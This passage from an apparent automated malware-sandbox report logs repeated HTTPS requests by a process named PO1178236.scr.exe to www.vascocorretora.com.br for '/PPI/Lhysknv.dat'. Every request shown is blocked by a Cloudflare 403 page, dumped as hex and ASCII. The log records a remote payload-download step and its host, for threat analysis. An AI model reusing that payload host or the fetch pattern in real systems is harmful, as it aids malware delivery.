        2025-01-09 07:36:34 UTC1369INData Raw: 65 63 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d
        Data Ascii: ection cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>...
        2025-01-09 07:36:34 UTC1369INData Raw: 6d 3a 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 63 63 64 38 66 30 34 32 31 63 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a
        Data Ascii: m:text-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1ccd8f0421c</strong></span> <span class="cf-footer-separator sm:
        2025-01-09 07:36:34 UTC1006INData Raw: 3e 0a 20 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 63 63 64 38 66 30 34 32 31 63 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4e 43 34 77 4d 44 41 77 4d 44 41 3d
        Data Ascii: > window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1ccd8f0421c',t:'MTczNjQwODE5NC4wMDAwMDA=
        2025-01-09 07:36:34 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        61192.168.2.949769188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:34 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:34 UTC1005INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:34 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:49 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wotu1pUcW18qWVuRcgcVf0fmt4GruJwMOqxBPy05%2BGFBukFiptToy6BB6UrCgorlg1G93ZjNP8OpeXUABD%2FCZ5geHrsTo9lm2h3g4TOQmp081x%2BKdHS6EWnyPLsuHRMxY60CKqHNmmJ6xMTt"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1d0993a0f77-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1629&rtt_var=619&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1757977&cwnd=231&unsent_bytes=0&cid=a6bc217107578799&ts=127&x=0"
        2025-01-09 07:36:34 UTC364INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:34 UTC1369INData Raw: 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69
        Data Ascii: are</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=devi
        2025-01-09 07:36:34 UTC1369INData Raw: 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63 61 70 74 63
        Data Ascii: f-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.captc
        2025-01-09 07:36:34 UTC1369INData Raw: 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 64 30 39 39 33 61 30 66 37 37 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e
        Data Ascii: eft border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1d0993a0f77</strong></span> <span class="cf-footer-separator sm:hidden">
        2025-01-09 07:36:34 UTC998INData Raw: 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 64 30 39 39 33 61 30 66 37 37 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4e 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61
        Data Ascii: ow._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1d0993a0f77',t:'MTczNjQwODE5NC4wMDAwMDA='};var a
        2025-01-09 07:36:34 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        62192.168.2.949770188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:35 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:35 UTC1009INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:35 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:50 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ATrheb7kFK28JY3TWxFr01gLP6QbAn5JEoTL4pUia9%2BCtf1hdo1sy4u%2FI83vQjb%2B4w6bSX9Z5uD8TJxXDs6SYCrLPJ6w5TlZVv3bN3p0%2F7vyENWki5%2FEMUnFOzJO96TmGLR3lgXK8bdCNpAO"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1d47809c34d-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1521&rtt_var=585&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=704&delivery_rate=1849271&cwnd=252&unsent_bytes=0&cid=ce018c7b5b5829ba&ts=129&x=0"
        2025-01-09 07:36:35 UTC360INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:35 UTC1369INData Raw: 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d
        Data Ascii: udflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=
        2025-01-09 07:36:35 UTC1369INData Raw: 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 63
        Data Ascii: on cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /.c
        2025-01-09 07:36:35 UTC1369INData Raw: 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 64 34 37 38 30 39 63 33 34 64 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64
        Data Ascii: xt-left border-solid border-0 border-t border-gray-300"> <p class="text-13"> <span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">8ff2c1d47809c34d</strong></span> <span class="cf-footer-separator sm:hidd
        2025-01-09 07:36:35 UTC1002INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 74 72 61 6e 73 6c 61 74 69 6f 6e 20 3d 20 7b 7d 3b 0a 20 20 0a 20 20 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 66 66 32 63 31 64 34 37 38 30 39 63 33 34 64 27 2c 74 3a 27 4d 54 63 7a 4e 6a 51 77 4f 44 45 35 4e 53 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76
        Data Ascii: window._cf_translation = {}; </script><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ff2c1d47809c34d',t:'MTczNjQwODE5NS4wMDAwMDA='};v
        2025-01-09 07:36:35 UTC5INData Raw: 30 0d 0a 0d 0a
        Data Ascii: 0


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        63192.168.2.949771188.114.96.34437668C:\Users\user\Desktop\PO1178236.scr.exe
        TimestampBytes transferredDirectionData
        2025-01-09 07:36:35 UTC66OUTGET /PPI/Lhysknv.dat HTTP/1.1
        Host: www.vascocorretora.com.br
        2025-01-09 07:36:35 UTC1011INHTTP/1.1 403 Forbidden
        Date: Thu, 09 Jan 2025 07:36:35 GMT
        Content-Type: text/html; charset=UTF-8
        Transfer-Encoding: chunked
        Connection: close
        Cache-Control: max-age=15
        Expires: Thu, 09 Jan 2025 07:36:50 GMT
        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lJg3I01bNrQhos8uBsvpPozBRaIo%2BF15Bo9BYZeBf1jMINxzo%2BFIbD%2FsAmuMZIlpZt6s5n9XfKG3ItsYUfTssKcinLToZiaxRDbCzO%2FKICNYWAOdVg7HcJk0nB2KHgyEJa%2BjqN4Xnd%2Ba5Loj"}],"group":"cf-nel","max_age":604800}
        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
        expect-ct: max-age=86400, enforce
        referrer-policy: same-origin
        x-content-type-options: nosniff
        x-frame-options: SAMEORIGIN
        x-xss-protection: 1; mode=block
        Server: cloudflare
        CF-RAY: 8ff2c1d83d604299-EWR
        alt-svc: h3=":443"; ma=86400
        server-timing: cfL4;desc="?proto=TCP&rtt=1705&min_rtt=1688&rtt_var=668&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2854&recv_bytes=704&delivery_rate=1597374&cwnd=251&unsent_bytes=0&cid=178c0f5b77ecb4ac&ts=128&x=0"
        2025-01-09 07:36:35 UTC358INData Raw: 31 35 35 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
        Data Ascii: 1555<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
        2025-01-09 07:36:35 UTC1369INData Raw: 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74
        Data Ascii: loudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="widt
        2025-01-09 07:36:35 UTC1369INData Raw: 74 69 6f 6e 20 63 66 2d 68 69 67 68 6c 69 67 68 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 63 6f 6e 74 61 69 6e 65 72 20 63 66 2d 73 63 72 65 65 6e 73 68 6f 74 2d 66 75 6c 6c 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 6e 6f 2d 73 63 72 65 65 6e 73 68 6f 74 20 65 72 72 6f 72 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f
        Data Ascii: tion cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-screenshot error"></span> </div> </div> </div>... /
        2025-01-09 07:36:35 UTC1369INData Raw: 74 65 78 74 2d 6c 65 66 74 20 62 6f 72 64 65 72 2d 73 6f 6c 69 64 20 62 6f 72 64 65 72 2d 30 20 62 6f 72 64 65 72 2d 74 20 62 6f 72 64 65 72 2d 67 72 61 79 2d 33 30 30 22 3e 0a 20 20 3c 70 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 31 33 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 43 6c 6f 75 64 66 6c 61 72 65 20 52 61 79 20 49 44 3a 20 3c 73 74 72 6f 6e 67 20 63 6c 61 73 73 3d 22 66 6f 6e 74 2d 73 65 6d 69 62 6f 6c 64 22 3e 38 66 66 32 63 31 64 38 33 64 36 30 34 32 39 39 3c 2f 73 74 72 6f 6e 67 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 